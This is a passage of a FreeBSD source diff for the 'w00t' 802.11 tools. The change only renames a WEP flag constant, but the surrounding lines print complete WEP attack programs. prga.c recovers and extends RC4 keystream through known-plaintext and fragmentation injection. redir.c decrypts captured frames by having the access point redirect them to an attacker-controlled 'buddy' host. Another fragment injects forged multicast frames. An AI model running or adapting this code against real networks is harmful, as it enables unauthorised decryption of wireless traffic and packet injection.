wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA; wh->i_fc[0] |= IEEE80211_FC0_SUBTYPE_DATA; wh->i_fc[1] |= IEEE80211_FC1_DIR_TODS; - wh->i_fc[1] |= IEEE80211_FC1_WEP; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED; wh->i_dur[0] = 0x69; memcpy(wh->i_addr1, p->ap, 6); memcpy(wh->i_addr2, p->mac, 6); memcpy(wh->i_addr3, p->mcast, 5); wh->i_addr3[5] = x; seq = (short*) wh->i_seq; *seq = seqfn(p->seq++, 0); /* IV */ data = (char*) (wh+1); ptr = (char*) (q->wh+1); memcpy(data, ptr, 3); if (p->prga_len == 0) { RC4_KEY k; unsigned char key[8]; memset(&key[3], 0x61, 5); memcpy(key, (q->wh+1), 3); p->prga_len = 128; RC4_set_key(&k, 8, key); memset(p->prga, 0, sizeof(p->prga)); RC4(&k, p->prga_len, p->prga, p->prga); #if 0 int ptl = q->len; char *pt; pt = known_pt(q->wh, &ptl); ptr += 4; p->prga_len = ptl; for (i = 0; i < p->prga_len; i++) p->prga[i] = ptr[i] ^ pt[i]; #endif } /* data */ data += 4; memcpy(data, payload, sizeof(payload)); p->prga_len = 12; len = p->prga_len + 1 - 4; #if 1 if (len < sizeof(payload)) { need_frag = len; wh->i_fc[1] |= IEEE80211_FC1_MORE_FRAG; } #endif /* crc */ pcrc = (uLong*) (data+len); *pcrc = crc32(crc, data, len); /* wepify */ len += 4; for (i = 0; i < (len); i++) { assert( i <= p->prga_len); data[i] ^= p->prga[i]; } // data[i] ^= x; len += sizeof(*wh); p->packet_len = len + 4; send_packet(p); /* the data we sent is too fucking short */ if (need_frag) { memset(data, 0, len); /* 802.11 */ *seq = seqfn(p->seq-1, 1); wh->i_fc[1] &= ~IEEE80211_FC1_MORE_FRAG; /* data */ len = sizeof(payload) - need_frag; assert(len > 0 && len <= (p->prga_len - 4)); memcpy(data, &payload[need_frag], len); /* crc */ crc = crc32(0L, Z_NULL, 0); len = p->prga_len - 4; pcrc = (uLong*) (data+len); *pcrc = crc32(crc, data, len); /* wepify */ len += 4; for (i = 0; i < len; i++) { assert( i < p->prga_len); data[i] ^= p->prga[i]; } len += sizeof(*wh) + 4; p->packet_len = len; send_packet(p); } } void send_queue(struct params *p) { struct queue *q = p->q; int i; assert(q); assert(q->live); for (i = 0; i < 5; i++) { send_mcast(p, p->guess++); } p->state = S_WAIT_RELAY; } void got_mcast(struct params *p, struct ieee80211_frame *wh, int len) { printf("ao\n"); } void read_wifi(struct params *p) { static char *buf = 0; static int buflen = 4096; struct ieee80211_frame *wh; int rc; if (!buf) { buf = (char*) malloc(buflen); if (!buf) err(1, "malloc()"); } rc = sniff(p->rx, buf, buflen); if (rc == -1) err(1, "sniff()"); wh = get_wifi(buf, &rc); if (!wh) return; /* relayed macast */ if (frame_type(wh, IEEE80211_FC0_TYPE_DATA, IEEE80211_FC0_SUBTYPE_DATA) && (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) && (memcmp(wh->i_addr2, p->ap, 6) == 0) && (memcmp(wh->i_addr1, p->mcast, 5) == 0) && (memcmp(p->mac, wh->i_addr3, 6) == 0)) { got_mcast(p, wh, rc); return; } /* data */ if (frame_type(wh, IEEE80211_FC0_TYPE_DATA, IEEE80211_FC0_SUBTYPE_DATA)) { if (!wanted(p, wh, rc)) return; enque(p, &buf, wh, rc); if (p->state == S_START) send_queue(p); return; } } void own(struct params *p) { struct timeval tv; struct timeval *to = NULL; fd_set fds; int tout = 10*1000; if (p->state == S_WAIT_RELAY) { int el; /* check timeout */ if (gettimeofday(&tv, NULL) == -1) err(1, "gettimeofday()"); el = elapsed(&p->last, &tv); /* timeout */ if (el >= tout) { if (p->q && p->q->live) { send_queue(p); el = 0; } else { p->state = S_START; return; } } el = tout - el; tv.tv_sec = el/1000/1000; tv.tv_usec = el - tv.tv_sec*1000*1000; to = &tv; } FD_ZERO(&fds); FD_SET(p->rx, &fds); if (select(p->rx+1, &fds, NULL, NULL, to) == -1) err(1, "select()"); if (FD_ISSET(p->rx, &fds)) read_wifi(p); } void usage(char *name) { printf("Usage %s \n" "-h\thelp\n" "-b\t\n" "-t\t\n" , name); exit(1); } int main(int argc, char *argv[]) { struct params p; char *iface = "wlan0"; char *tap = "tap0"; int ch; memset(&p, 0, sizeof(p)); memcpy(p.mac, "\x00\x00\xde\xfa\xce\xd", 6); p.seq = getpid(); memcpy(p.mcast, "\x01\x00\x5e\x00\x00", 5); while ((ch = getopt(argc, argv, "hb:t:")) != -1) { switch (ch) { case 't': tap = optarg; break; case 'b': if (str2mac(p.ap, optarg) == -1) { printf("Can't parse BSSID\n"); exit(1); } break; case 'h': default: usage(argv[0]); break; } } if ((p.rx = open_rx(iface)) == -1) err(1, "open_rx()"); if ((p.tx = open_tx(iface)) == -1) err(1, "open_tx()"); if ((p.tap = open_tap(tap)) == -1) err(1, "open_tap()"); if (set_iface_mac(tap, p.mac) == -1) err(1, "set_iface_mac()"); p.state = S_START; while (1) own(&p); exit(0); } diff --git a/tools/tools/net80211/w00t/prga/prga.c b/tools/tools/net80211/w00t/prga/prga.c index 173dde787f9e..c75d20f94f6a 100644 --- a/tools/tools/net80211/w00t/prga/prga.c +++ b/tools/tools/net80211/w00t/prga/prga.c @@ -1,664 +1,664 @@ /*- * Copyright (c) 2006, Andrea Bittau * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $FreeBSD$ */ #include #include #include #include #include #include #include #include #include #include #include #include "w00t.h" static char *known_pt_arp = "\xAA\xAA\x03\x00\x00\x00\x08\x06"; static char *known_pt_ip = "\xAA\xAA\x03\x00\x00\x00\x08\x00"; static int known_pt_len = 8; enum { S_START = 0, S_SEND_FRAG, S_WAIT_ACK, S_WAIT_RELAY }; struct params { int tx; int rx; char mac[6]; char ap[6]; char prga[2048]; int prga_len; char iv[3]; char *fname; struct timeval last; char packet[2048]; int packet_len; int state; char data[2048]; char *data_ptr; int data_len; int data_try; int mtu; int seq; int frag; int tap; }; void usage(char *p) { printf("Usage: %s \n" "-h\thelp\n" "-b\t\n" "-t\t\n" , p); exit(0); } void load_prga(struct params *p) { int fd; int rd; fd = open(p->fname, O_RDONLY); if (fd == -1) { p->prga_len = 0; return; } rd = read(fd, p->iv, 3); if (rd == -1) err(1, "read()"); if (rd != 3) { printf("Short read\n"); exit(1); } rd = read(fd, p->prga, sizeof(p->prga)); if (rd == -1) err(1, "read()"); p->prga_len = rd; printf("Loaded %d PRGA from %s\n", p->prga_len, p->fname); close(fd); } void save_prga(struct params *p) { int fd; int rd; fd = open(p->fname, O_WRONLY | O_CREAT, 0644); if (fd == -1) err(1, "open()"); rd = write(fd, p->iv, 3); if (rd == -1) err(1, "write()"); if (rd != 3) { printf("Short write\n"); exit(1); } rd = write(fd, p->prga, p->prga_len); if (rd == -1) err(1, "write()"); if (rd != p->prga_len) { printf("Wrote %d/%d\n", rd, p->prga_len); exit(1); } close(fd); printf("Got %d bytes of PRGA\n", p->prga_len); } int is_arp(struct ieee80211_frame *wh, int len) { /* XXX */ if (len > (sizeof(*wh) + 4 + 4 + 39)) return 0; return 1; } void get_prga(struct params *p) { char buf[4096]; int rc; struct ieee80211_frame *wh; char *bssid; char *ptr; char *known_pt; rc = sniff(p->rx, buf, sizeof(buf)); if (rc == -1) err(1, "sniff()"); wh = get_wifi(buf, &rc); if (!wh) return; if (!frame_type(wh, IEEE80211_FC0_TYPE_DATA, IEEE80211_FC0_SUBTYPE_DATA)) return; if (is_arp(wh, rc)) known_pt = known_pt_arp; else known_pt = known_pt_ip; if (wh->i_fc[1] & IEEE80211_FC1_DIR_TODS) bssid = wh->i_addr1; else bssid = wh->i_addr2; if (memcmp(p->ap, bssid, 6) != 0) return; - if (!(wh->i_fc[1] & IEEE80211_FC1_WEP)) { + if (!(wh->i_fc[1] & IEEE80211_FC1_PROTECTED)) { printf("Packet not WEP!\n"); return; } ptr = (char*) (wh+1); memcpy(p->iv, ptr, 3); ptr += 4; rc -= sizeof(wh) + 4; assert(rc >= known_pt_len); for (rc = 0; rc < known_pt_len; rc++) { p->prga[rc] = known_pt[rc] ^ (*ptr); ptr++; } p->prga_len = rc; save_prga(p); } void start(struct params *p) { int len; len = p->prga_len; len -= 4; assert(len > 0); len *= 4; if (len > p->mtu) len = p->mtu; p->data_len = len; memset(p->data, 0, p->data_len); memcpy(p->data, "\xaa\xaa\x03\x00\x00\x00\x08\x06", 8); p->data_ptr = p->data; p->data_try = 0; p->seq++; p->frag = 0; p->state = S_SEND_FRAG; } void send_packet(struct params *p) { int rc; struct ieee80211_frame *wh; rc = inject(p->tx, p->packet, p->packet_len); if (rc == -1) err(1, "inject()"); if (rc != p->packet_len) { printf("Wrote %d/%d\n", rc, p->packet_len); exit(1); } p->data_try++; wh = (struct ieee80211_frame*) p->packet; wh->i_fc[1] |= IEEE80211_FC1_RETRY; if (gettimeofday(&p->last, NULL) == -1) err(1, "gettimeofday()"); } void send_frag(struct params *p) { struct ieee80211_frame *wh; int dlen, rem; int last = 0; short *seqp; char *ptr; uLong *pcrc; uLong crc = crc32(0L, Z_NULL, 0); int i; memset(p->packet, 0, sizeof(p->packet)); wh = (struct ieee80211_frame*) p->packet; /* calculate how much data we need to copy */ dlen = p->prga_len - 4; rem = p->data_ptr - p->data; rem = p->data_len - rem; if (rem <= dlen) { dlen = rem; last = 1; } /* 802.11 */ wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA; wh->i_fc[0] |= IEEE80211_FC0_SUBTYPE_DATA; - wh->i_fc[1] |= IEEE80211_FC1_WEP; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED; wh->i_fc[1] |= IEEE80211_FC1_DIR_TODS; if (!last) wh->i_fc[1] |= IEEE80211_FC1_MORE_FRAG; wh->i_dur[0] = 0x69; wh->i_dur[1] = 0x00; memcpy(wh->i_addr1, p->ap, 6); memcpy(wh->i_addr2, p->mac, 6); memset(wh->i_addr3, 0xff, 6); seqp = (short*) wh->i_seq; *seqp = seqfn(p->seq, p->frag); p->frag++; /* IV & data */ ptr = (char*) (wh+1); memcpy(ptr, p->iv, 3); ptr += 4; memcpy(ptr, p->data_ptr, dlen); /* crc */ crc = crc32(crc, ptr, dlen); pcrc = (uLong*) (ptr+dlen); *pcrc = crc; /* wepify */ for (i = 0; i < dlen+4; i++) ptr[i] = ptr[i] ^ p->prga[i]; /* prepare for next frag */ p->packet_len = sizeof(*wh) + 4 + dlen + 4; p->data_ptr += dlen; #if 0 printf("Sening %sfrag [%d/%d] [len=%d]\n", last ? "last " : "", p->seq, p->frag, dlen); #endif if (last) { p->data_ptr = p->data; p->frag = 0; p->seq++; } /* send it off */ send_packet(p); p->state = S_WAIT_ACK; } void wait_ack(struct params *p) { struct timeval now; int el; int tout = 10*1000; fd_set fds; int rc; char buf[4096]; struct ieee80211_frame *wh; if (gettimeofday(&now, NULL) == -1) err(1, "gettimeofday()"); /* check for timeout */ el = elapsed(&p->last, &now); if (el >= tout) { if (p->data_try >= 3) { #if 0 printf("Re-sending whole lot\n"); #endif p->state = S_START; return; } #if 0 printf("Re-sending frag\n"); #endif send_packet(p); el = 0; } el = tout - el; now.tv_sec = el/1000/1000; now.tv_usec = el - now.tv_sec*1000*1000; FD_ZERO(&fds); FD_SET(p->rx, &fds); if (select(p->rx+1, &fds, NULL, NULL, &now) == -1) err(1, "select()"); if (!FD_ISSET(p->rx, &fds)) return; /* grab ack */ rc = sniff(p->rx, buf, sizeof(buf)); if (rc == -1) err(1, "sniff()"); wh = get_wifi(buf, &rc); if (!wh) return; if (!frame_type(wh, IEEE80211_FC0_TYPE_CTL, IEEE80211_FC0_SUBTYPE_ACK)) return; if (memcmp(p->mac, wh->i_addr1, 6) != 0) return; /* wait for relay */ if (p->frag == 0) { p->state = S_WAIT_RELAY; if (gettimeofday(&p->last, NULL) == -1) err(1, "gettimeofday()"); } else p->state = S_SEND_FRAG; } void wait_relay(struct params *p) { int tout = 20*1000; struct timeval now; int el; fd_set fds; int rc; char buf[4096]; struct ieee80211_frame *wh; char *ptr; uLong crc = crc32(0L, Z_NULL, 0); uLong *pcrc; if (gettimeofday(&now, NULL) == -1) err(1, "gettimeofday()"); el = elapsed(&p->last, &now); if (el >= tout) { #if 0 printf("No relay\n"); #endif p->state = S_START; return; } el = tout - el; now.tv_sec = el/1000/1000; now.tv_usec = el - now.tv_sec*1000*1000; FD_ZERO(&fds); FD_SET(p->rx, &fds); if (select(p->rx+1, &fds, NULL, NULL, &now) == -1) err(1, "select()"); if (!FD_ISSET(p->rx, &fds)) return; /* get relay */ rc = sniff(p->rx, buf, sizeof(buf)); if (rc == -1) err(1, "sniff()"); wh = get_wifi(buf, &rc); if (!wh) return; if (!frame_type(wh, IEEE80211_FC0_TYPE_DATA, IEEE80211_FC0_SUBTYPE_DATA)) return; if (memcmp(wh->i_addr2, p->ap, 6) != 0) return; if (memcmp(wh->i_addr3, p->mac, 6) != 0) return; if (memcmp(wh->i_addr1, "\xff\xff\xff\xff\xff\xff", 6) != 0) return; /* lends different due to padding? */ if ( (rc - sizeof(*wh) - 8) != p->data_len) return; /* grab new PRGA */ assert(p->data_len >= p->prga_len); ptr = (char*) (wh+1); memcpy(p->iv, ptr, 3); ptr += 4; crc = crc32(crc, p->data, p->data_len); pcrc = (uLong*) &p->data[p->data_len]; /* XXX overflow ph33r */ *pcrc = crc; for (rc = 0; rc < p->data_len+4; rc++) p->prga[rc] = p->data[rc] ^ ptr[rc]; p->prga_len = p->data_len+4; p->state = S_START; save_prga(p); } void get_more_prga(struct params *p) { switch (p->state) { case S_START: start(p); break; case S_SEND_FRAG: send_frag(p); break; case S_WAIT_ACK: wait_ack(p); break; case S_WAIT_RELAY: wait_relay(p); break; default: printf("WTF %d\n", p->state); abort(); break; } } void read_tap(struct params *p) { int offset; char *ptr; struct ieee80211_frame *wh; int rc; char dst[6]; short *seq; uLong *pcrc; uLong crc = crc32(0L, Z_NULL, 0); memset(p->packet, 0, sizeof(p->packet)); offset = sizeof(*wh) + 4 + 8 - 14; rc = sizeof(p->packet) - offset; ptr = &p->packet[offset]; rc = read(p->tap, ptr, rc); if (rc == -1) err(1, "read()"); memcpy(dst, ptr, sizeof(dst)); wh = (struct ieee80211_frame*) p->packet; wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA; wh->i_fc[0] |= IEEE80211_FC0_SUBTYPE_DATA; - wh->i_fc[1] |= IEEE80211_FC1_WEP; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED; wh->i_fc[1] |= IEEE80211_FC1_DIR_TODS; wh->i_dur[0] = 0x69; memcpy(wh->i_addr1, p->ap, 6); memcpy(wh->i_addr2, p->mac, 6); memcpy(wh->i_addr3, dst, 6); seq = (short*) wh->i_seq; *seq = seqfn(p->seq++, 0); /* data */ ptr = (char*) (wh+1); memcpy(ptr, p->iv, 3); ptr += 3; *ptr++ = 0; memcpy(ptr, "\xAA\xAA\x03\x00\x00\x00", 6); rc -= 14; rc += 8; crc = crc32(crc, ptr, rc); pcrc = (uLong*) (ptr+rc); *pcrc = crc; rc += 4; assert(p->prga_len >= rc); /* wepify */ for (offset = 0; offset < rc; offset++) ptr[offset] ^= p->prga[offset]; p->packet_len = sizeof(*wh) + 4 + rc; p->data_try = 0; send_packet(p); p->state = S_WAIT_ACK; } /* XXX */ void wait_tap_ack(struct params *p) { p->data_try = 0; p->frag = 1; wait_ack(p); if (p->state == S_SEND_FRAG) { #if 0 printf("Got ACK\n"); #endif p->state = S_START; } } void transmit(struct params *p) { switch (p->state) { case S_START: read_tap(p); break; case S_WAIT_ACK: wait_tap_ack(p); break; default: printf("wtf %d\n", p->state); abort(); break; } } int main(int argc, char *argv[]) { struct params p; char *iface = "wlan0"; char *tap = "tap0"; int ch; memset(&p, 0, sizeof(p)); p.fname = "prga.log"; memcpy(p.mac, "\x00\x00\xde\xfa\xce\x0d", 6); p.state = S_START; p.mtu = 1500; p.seq = getpid(); while ((ch = getopt(argc, argv, "hb:t:")) != -1) { switch (ch) { case 'b': if (str2mac(p.ap, optarg) == -1) { printf("Can't parse BSSID\n"); exit(1); } break; case 't': tap = optarg; break; case 'h': default: usage(argv[0]); break; } } /* init */ if ((p.rx = open_rx(iface)) == -1) err(1, "open_rx()"); if ((p.tx = open_tx(iface)) == -1) err(1, "open_tx()"); if ((p.tap = open_tap(tap)) == -1) err(1, "open_tap()"); if (set_iface_mac(tap, p.mac) == -1) err(1, "set_iface_mac()"); printf("Obtaining PRGA\n"); /* make sure we got some prga */ load_prga(&p); while (p.prga_len == 0) get_prga(&p); /* lets grab some more */ while (p.prga_len < p.mtu) get_more_prga(&p); /* transmit */ p.state = S_START; while (1) transmit(&p); exit(0); } diff --git a/tools/tools/net80211/w00t/redir/redir.c b/tools/tools/net80211/w00t/redir/redir.c index 9be363e2f0a3..ad574ea9a251 100644 --- a/tools/tools/net80211/w00t/redir/redir.c +++ b/tools/tools/net80211/w00t/redir/redir.c @@ -1,709 +1,709 @@ /*- * Copyright (c) 2006, Andrea Bittau * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $FreeBSD$ */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "w00t.h" enum { S_START = 0, S_WAIT_ACK, S_WAIT_BUDDY }; struct queue { struct ieee80211_frame *wh; int len; int id; char *buf; int live; struct queue *next; }; struct params { int rx; int tx; int s; int port; int tap; char mac[6]; char ap[6]; char rtr[6]; struct in_addr src; struct in_addr dst; char prga[2048]; int prga_len; char iv[3]; char *fname; int state; struct queue *q; char packet[2048]; int packet_len; struct timeval last; int id; int data_try; int seq; int frag; char buddy_data[2048]; int buddy_got; }; void load_prga(struct params *p) { int fd; int rd; fd = open(p->fname, O_RDONLY); if (fd == -1) { p->prga_len = 0; return; } rd = read(fd, p->iv, 3); if (rd == -1) err(1, "read()"); if (rd != 3) { printf("Short read\n"); exit(1); } rd = read(fd, p->prga, sizeof(p->prga)); if (rd == -1) err(1, "read()"); p->prga_len = rd; printf("Loaded %d PRGA from %s\n", p->prga_len, p->fname); close(fd); } int wanted(struct params *p, struct ieee80211_frame *wh, int len) { char *bssid, *sa; if (wh->i_fc[1] & IEEE80211_FC1_DIR_TODS) { bssid = wh->i_addr1; sa = wh->i_addr2; } else { bssid = wh->i_addr2; sa = wh->i_addr3; } if (memcmp(bssid, p->ap, 6) != 0) return 0; - if (!(wh->i_fc[1] & IEEE80211_FC1_WEP)) { + if (!(wh->i_fc[1] & IEEE80211_FC1_PROTECTED)) { printf("Got non WEP packet...\n"); return 0; } /* my own shit */ if (memcmp(p->mac, sa, 6) == 0) return 0; return 1; } void enque(struct params *p, char **buf, struct ieee80211_frame *wh, int len) { struct queue *q = p->q; int qlen = 0; char *ret = NULL; struct queue *last = NULL; /* find a slot */ while (q) { if (q->live) qlen++; else { /* recycle */ ret = q->buf; break; } last = q; q = q->next; } /* need to create slot */ if (!q) { q = (struct queue*) malloc(sizeof(*q)); if (!q) err(1, "malloc()"); memset(q, 0, sizeof(*q)); /* insert */ if (!p->q) p->q = q; else { assert(last); last->next = q; } } q->live = 1; q->buf = *buf; q->len = len; q->wh = wh; q->id = p->id++; qlen++; if (qlen > 5) printf("Enque. Size: %d\n", qlen); *buf = ret; } /********** RIPPED ************/ unsigned short in_cksum (unsigned short *ptr, int nbytes) { register long sum; u_short oddbyte; register u_short answer; sum = 0; while (nbytes > 1) { sum += *ptr++; nbytes -= 2; } if (nbytes == 1) { oddbyte = 0; *((u_char *) & oddbyte) = *(u_char *) ptr; sum += oddbyte; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return (answer); } /************** ************/ void send_packet(struct params *p) { int rc; struct ieee80211_frame *wh; rc = inject(p->tx, p->packet, p->packet_len); if (rc == -1) err(1, "inject()"); if (rc != p->packet_len) { printf("Wrote %d/%d\n", rc, p->packet_len); exit(1); } p->data_try++; wh = (struct ieee80211_frame*) p->packet; wh->i_fc[1] |= IEEE80211_FC1_RETRY; if (gettimeofday(&p->last, NULL) == -1) err(1, "gettimeofday()"); } void send_header(struct params *p, struct queue *q) { struct ieee80211_frame *wh; short *pseq; char *ptr; struct ip *ih; int len, i; uLong crc = crc32(0L, Z_NULL, 0); uLong *pcrc; /* 802.11 */ memset(p->packet, 0, sizeof(p->packet)); wh = (struct ieee80211_frame *) p->packet; wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA; wh->i_fc[0] |= IEEE80211_FC0_SUBTYPE_DATA; wh->i_fc[1] |= IEEE80211_FC1_DIR_TODS; - wh->i_fc[1] |= IEEE80211_FC1_WEP; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED; wh->i_fc[1] |= IEEE80211_FC1_MORE_FRAG; wh->i_dur[0] = 0x69; memcpy(wh->i_addr1, p->ap, 6); memcpy(wh->i_addr2, p->mac, 6); memcpy(wh->i_addr3, p->rtr, 6); pseq = (short*) wh->i_seq; p->frag = 0; p->seq++; *pseq = seqfn(p->seq, p->frag++); /* IV */ ptr = (char*) (wh+1); memcpy(ptr, p->iv, 3); ptr += 4; /* LLC/SNAP */ memcpy(ptr, "\xAA\xAA\x03\x00\x00\x00\x08\x00", 8); /* IP */ ih = (struct ip*) (ptr+8); ih->ip_v = 4; ih->ip_hl = 5; len = q->len - sizeof(*wh) - 4 - 4 + 20; ih->ip_len = htons(len); ih->ip_id = htons(q->id); ih->ip_ttl = 69; ih->ip_p = 0; ih->ip_src.s_addr = p->src.s_addr; ih->ip_dst.s_addr = p->dst.s_addr; ih->ip_sum = in_cksum((unsigned short*)ih, 20); /* ICV */ len = 8 + 20; crc = crc32(crc, ptr, len); pcrc = (uLong*) (ptr+len); *pcrc = crc; /* wepify */ for (i = 0; i < len + 4; i++) ptr[i] ^= p->prga[i]; p->packet_len = sizeof(*wh) + 4 + len + 4; p->data_try = 0; send_packet(p); } void send_queue(struct params *p) { struct queue *q = p->q; assert(q); assert(q->live); send_header(p, q); p->state = S_WAIT_ACK; } void send_data(struct params *p) { struct ieee80211_frame *wh; short *seq; struct queue *q = p->q; char *dst, *src; int len; assert(q); /* 802.11 */ memset(p->packet, 0, sizeof(p->packet)); wh = (struct ieee80211_frame*) p->packet; wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA; wh->i_fc[0] |= IEEE80211_FC0_SUBTYPE_DATA; wh->i_fc[1] |= IEEE80211_FC1_DIR_TODS; - wh->i_fc[1] |= IEEE80211_FC1_WEP; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED; wh->i_dur[0] = 0x69; memcpy(wh->i_addr1, p->ap, 6); memcpy(wh->i_addr2, p->mac, 6); memcpy(wh->i_addr3, p->rtr, 6); seq = (short*) wh->i_seq; *seq = seqfn(p->seq, p->frag++); /* data */ dst = (char*) (wh+1); src = (char*) (q->wh+1); len = q->len - sizeof(*wh); memcpy(dst, src, len); p->packet_len = sizeof(*wh) + len; p->data_try = 0; send_packet(p); } void got_ack(struct params *p) { switch (p->frag) { case 1: send_data(p); break; case 2: p->state = S_WAIT_BUDDY; p->data_try = 69; break; } } void read_wifi(struct params *p) { static char *buf = 0; static int buflen = 4096; struct ieee80211_frame *wh; int rc; if (!buf) { buf = (char*) malloc(buflen); if (!buf) err(1, "malloc()"); } rc = sniff(p->rx, buf, buflen); if (rc == -1) err(1, "sniff()"); wh = get_wifi(buf, &rc); if (!wh) return; /* acks */ if (frame_type(wh, IEEE80211_FC0_TYPE_CTL, IEEE80211_FC0_SUBTYPE_ACK) && (memcmp(p->mac, wh->i_addr1, 6) == 0)) { got_ack(p); return; } /* data */ if (frame_type(wh, IEEE80211_FC0_TYPE_DATA, IEEE80211_FC0_SUBTYPE_DATA)) { if (!wanted(p, wh, rc)) return; enque(p, &buf, wh, rc); if (p->state == S_START) send_queue(p); return; } } int connect_buddy(struct params *p) { struct sockaddr_in s_in; memset(&s_in, 0, sizeof(s_in)); s_in.sin_family = PF_INET; s_in.sin_port = htons(p->port); s_in.sin_addr.s_addr = p->dst.s_addr; if ((p->s = socket(s_in.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1) return -1; if (connect(p->s, (struct sockaddr*) &s_in, sizeof(s_in)) == -1) return -1; return 0; } void buddy_reset(struct params *p) { p->buddy_got = 0; if (connect_buddy(p) == -1) err(1, "connect_buddy()"); } int buddy_get(struct params *p, int len) { int rd; rd = recv(p->s, &p->buddy_data[p->buddy_got], len, 0); if (rd <= 0) { buddy_reset(p); return 0; } p->buddy_got += rd; return rd == len; } void read_buddy_head(struct params *p) { int rem; rem = 4 - p->buddy_got; if (!buddy_get(p, rem)) return; } void read_buddy_data(struct params *p) { unsigned short *ptr = (unsigned short*) p->buddy_data; int id, len, rem; struct queue *q = p->q; struct queue *last = p->q; char mac[12]; struct iovec iov[2]; id = ntohs(*ptr++); len = ntohs(*ptr++); rem = len + 4 - p->buddy_got; assert(rem > 0); if (!buddy_get(p, rem)) return; /* w00t, got it */ #if 0 printf("id=%d len=%d\n", id, len); #endif p->buddy_got = 0; /* feedback loop bullshit */ if (!q) return; if (!q->live) return; /* sanity chex */ if (q->id != id) { printf("Diff ID\n"); return; } rem = q->len - sizeof(*q->wh) - 4 - 4; if (rem != len) { printf("Diff len\n"); return; } /* tap */ if (q->wh->i_fc[1] & IEEE80211_FC1_DIR_TODS) { memcpy(mac, q->wh->i_addr3, 6); memcpy(&mac[6], q->wh->i_addr2, 6); } else { memcpy(mac, q->wh->i_addr1, 6); memcpy(&mac[6], q->wh->i_addr3, 6); } iov[0].iov_base = mac; iov[0].iov_len = sizeof(mac); iov[1].iov_base = (char*)ptr + 8 - 2; iov[1].iov_len = len - 8 + 2; rem = writev(p->tap, iov, sizeof(iov)/sizeof(struct iovec)); if (rem == -1) err(1, "writev()"); if (rem != (14+(len-8))) { printf("Short write %d\n", rem); exit(1); } /* deque */ q->live = 0; if (q->next) { p->q = q->next; while (last) { if (!last->next) { last->next = q; q->next = 0; break; } last = last->next; } } /* drain queue */ p->state = S_START; if (p->q->live) send_queue(p); } void read_buddy(struct params *p) { if (p->buddy_got < 4) read_buddy_head(p); else read_buddy_data(p); } void own(struct params *p) { struct timeval tv; struct timeval *to = NULL; fd_set fds; int max; int tout_ack = 10*1000; int tout_buddy = 2*1000*1000; int tout = (p->state == S_WAIT_BUDDY) ? tout_buddy : tout_ack; if (p->state == S_WAIT_ACK || p->state == S_WAIT_BUDDY) { int el; /* check timeout */ if (gettimeofday(&tv, NULL) == -1) err(1, "gettimeofday()"); el = elapsed(&p->last, &tv); /* timeout */ if (el >= tout) { if (p->data_try > 3) { p->state = S_START; return; } else { send_packet(p); el = 0; } } el = tout - el; tv.tv_sec = el/1000/1000; tv.tv_usec = el - tv.tv_sec*1000*1000; to = &tv; } FD_ZERO(&fds); FD_SET(p->rx, &fds); FD_SET(p->s, &fds); max = (p->rx > p->s) ? p->rx : p->s; if (select(max+1, &fds, NULL, NULL, to) == -1) err(1, "select()"); if (FD_ISSET(p->rx, &fds)) read_wifi(p); if (FD_ISSET(p->s, &fds)) read_buddy(p); } void usage(char *name) { printf("Usage %s \n" "-h\thelp\n" "-d\t\n" "-p\t\n" "-b\t\n" "-t\t\n" 